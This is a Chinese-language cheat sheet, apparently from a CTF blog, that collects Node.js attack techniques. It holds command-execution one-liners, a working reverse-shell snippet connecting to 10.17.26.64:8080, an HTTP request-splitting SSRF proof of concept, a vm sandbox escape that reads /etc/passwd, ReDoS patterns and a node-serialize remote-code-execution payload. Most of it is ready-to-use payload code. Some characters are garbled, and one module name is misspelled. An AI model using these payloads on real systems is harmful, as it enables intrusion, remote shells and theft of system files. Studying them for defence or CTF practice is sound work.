Nodejs 相关漏洞总结
命令执行
require('child_porcess').execSync('id');
global.process.mainModule.constructor._load('child_process').execSync('id');
require('fs').readdirSync('.').toString()
require('fs').readFileSync('a.js','utf-8')
require('fs').writeFileSync('message.txt','hello')
({}).constructor.constructor
// 反弹shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();
http拆分攻击
漏洞原理
具体见 这里
根据 这里
,漏洞范围在[6.0.0, 6.15.0) 和 [8.0.0, 8.14.0) 版本以内的nodejs都存在这个问题。
简而言之,漏洞原因是当http包在处理http请求路径时,默认使用了 latin1
单字节编码字符集,当我们的请求路径中含有多字节编码的unicode字符时,会被截断取最低字节。
比如 u0130
就会被截断为 u30
为了避免crlf注入,nodejs也会将输入的 rn
url编码为 %0d%0a
,但是我们可以通过上面的漏洞就可以绕过。
用 %C4%8D%C4%8A
代替 rn
就可以绕过
漏洞利用
一般是用做SSRF,通过crlf注入,向服务器发送走私内容。一般用来绕过内网限制。
下面是一个漏洞POC, 在存在漏洞的nodejs版本运行可以很形象的观察漏洞,来源于 这里
const http = require('http')
const server = http.createServer((req, res) => {
console.log(req.url);
res.end();
});
server.listen(8000, function() {
http.get('http://127.0.0.1:8000/?param=xu{0120}HTTP/1.1u{010D}u{010A}Host:{u0120}127.0.0.1:8000u{010D}u{010A}u{010D}u{010A}GETu{0120}/private', function() {
});
});
沙箱逃逸
vm
The vm module is not a security mechanism. Do not use it to run untrusted code.
vm
官方文档
也已经说了它是一个不安全的模块,而它也很容易逃逸。
在javascript中 this
是对当前对象的一个引用,那么在vm中的 this
指的就是vm上下文,说明已经是处于vm上下文之外了。
用 .constructor.constructor
可以索引到Function,创建匿名函数。那么在这个匿名函数中的 this
就是外部的 this
了
const vm = require("vm");
const result = vm.runInNewContext(`var process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(result)
这样就能取到沙箱外的process,执行命令了。
vm2
vm2
号称是能安全的执行不信任的代码的,默认情况下只有Javascript内置对象和Buffer可以访问。它内部使用vm模块创建上下文,并且通过JavaScript的Proxy机制防止逃逸出沙箱。
只要在运行过程中获取到任何一个外部的对象,就可以索引到外部的this。 这篇文章
是通过制造错误,引起外部报错,再捕获外部的报错实现逃逸的(已修复)。
XmiliaH
对很多个版本都有逃逸,但最新版都已修复。
reDos 漏洞
正则回溯导致的Dos漏洞。
除了导致Dos,还可以在某些环境下猜测被匹配的字符串。今年的xctf抗疫高校分享赛就有一道这样的题。
这里也有一个猜测字符串的 例子
。
下面有两个收集到的payload
/^((.*)+)+xxxx$/ 不以xxxx结尾则dos
/^(?=xxxx)(((.*)*)*)*salt$/ 以xxxx开头则dos
javascript 原型链污染
大致原理和CTF题目分析我以前分析过,这里不赘述
其他
node_serialize 漏洞
在 node_modulesnode-serializelibserialize.js
中非常简单的代码
反序列化时,使用eval处理 _$ND_FUNC$_
开头的代码
var FUNCFLAG = '_$ND_FUNC$_';
if(obj[key].indexOf(FUNCFLAG) === 0) {
obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
直接注入就行
var serialize = require('node-serialize');
var payload = '{"rce":"_$ND_FUNC$_require('child_process').exec('ls /',function(error, stdout, stderr){console.log(stdout)})"}';
serialize.unserialize(payload);
没有必要用IIFE
javascript 大小写特性
在toUpperCase()函数中,字符 ?
会转变为 I
,字符 ?
会变为 S
。在toLowerCase()函数中,字符 ?
会转变为 k
。
Node Js unicode failure
blackhat
上提出来的,原理与拆分攻击类似。因为内部使用UCS-2编码,也是在处理path时对unicode时对高位的截断。
比如 xFFx2E
会被截断为 x2E
,其中 xFFx2E
也就是 N
比如 x01x25
会被截断为 x25
,其中 x01x25
也就是 ?
这个知识点在CSAW2017出了几道题,我测试发现老版本的nodejs仍存在这个问题。
参考
https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html
https://xz.aliyun.com/t/7184
https://hpdoger.cn/2019/12/01/I-SOON2019-Membershop%E5%87%BA%E9%A2%98%E6%80%9D%E8%B7%AF/
https://diary.shift-js.info/blind-regular-expression-injection/
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf